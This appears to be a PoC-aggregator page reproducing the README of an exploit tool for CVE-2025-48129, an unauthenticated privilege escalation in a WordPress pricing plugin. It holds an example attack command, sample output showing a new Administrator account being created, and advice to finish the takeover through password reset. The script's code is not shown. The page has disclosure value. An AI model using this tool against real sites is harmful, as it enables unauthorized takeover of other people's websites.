POC详情: 55b1646679e33992c306d0642e408e46c52ada17

来源
关联漏洞
标题: WordPress plugin Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light 安全漏洞 (CVE-2025-48129)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light 2.4.37及之前版本存在安全漏洞,该漏洞源于权限分配不当,可能导致权限提升。
描述
 WordPress Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light Plugin <= 2.4.37 is vulnerable to Privilege Escalation 
介绍
# 🚨 CVE-2025-48129 - Privilege Escalation in WordPress Spreadsheet Price Changer Plugin

## 🛡️ Vulnerability Summary

- **Plugin Affected**: Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light
- **Vulnerable Versions**: `<= 2.4.37`
- **Patched Version**: ❌ *No official fix available*
- **Discovered By**: Patchstack | 20 May 2025
- **CVE ID**: `CVE-2025-48129`
- **CVSS Score**: `9.8 (Critical)`
- **Patch Priority**: 🔴 High

## 🔥 Risk

Unauthenticated attackers can escalate privileges by creating an Administrator-level account without needing any prior access. This allows complete takeover of the WordPress site.

> Classified under: **OWASP A7 – Identification and Authentication Failures**

---

## 🧪 Exploit Script Overview

This Python script targets vulnerable versions of the plugin and registers a new WordPress Administrator using only an email and password (hashed via MD5).

---

### ▶️ Example Usage

```bash
python CVE-2025-48129.py -u http://target-site.com/wordpress -mail NxploitBot@gmail.com -p nxploitadmin
```

---

### 📘 Usage Help

```bash
python CVE-2025-48129.py -help

usage: CVE-2025-48129.py [-h] -u URL -mail MAIL [-p PASSWORD]

CVE-2025-48129 - Unauthenticated Privilege Escalation Exploit by Khaled Alenazi (Nxploited)

options:
  -h, --help              show this help message and exit
  -u, --url URL           Target WordPress site URL (e.g., http://site.com/)
  -mail, --mail MAIL      Email for the new Admin account
  -p, --password PASSWORD Password to set (default: nxploitadmin)
```

---

### ✅ Successful Output Example

```
[*] Checking plugin version...
[*] Plugin version: 2.4.37
[*] Vulnerable version detected. Exploiting...
[+] Exploitation successful!

[*] Login credentials:
    Username: NxploitBot@gmail.com
    Password: 21232f297a57a5a743894a0e4a801fc3

[*] If login fails, reset the password manually via:
    http://target-site.com/wordpress/wp-login.php?action=lostpassword
```

---

## ⚠️ Important Note

In some cases, logging in directly with the chosen password may fail.  
This is **not a bug in the exploit**, but a result of how the vulnerable plugin passes hashed passwords to WordPress’s internal user creation system.

If you’re unable to log in, **simply reset the password via email** using the following URL:

```
http://target-site.com/wordpress/wp-login.php?action=lostpassword
```

WordPress will send a password reset email to the Admin account you just created — granting you full access.

---

## 🧾 Legal Disclaimer

This tool is provided for educational and authorized penetration testing purposes only.  
The author assumes no responsibility for misuse or damage caused by this script.

---

*By: Nxploited ( Khaled_alenazi )*
文件快照

[4.0K] /data/pocs/55b1646679e33992c306d0642e408e46c52ada17 ├── [3.4K] CVE-2025-48129.py ├── [1.1K] LICENSE ├── [2.7K] README.md └── [ 9] requirements.txt 0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。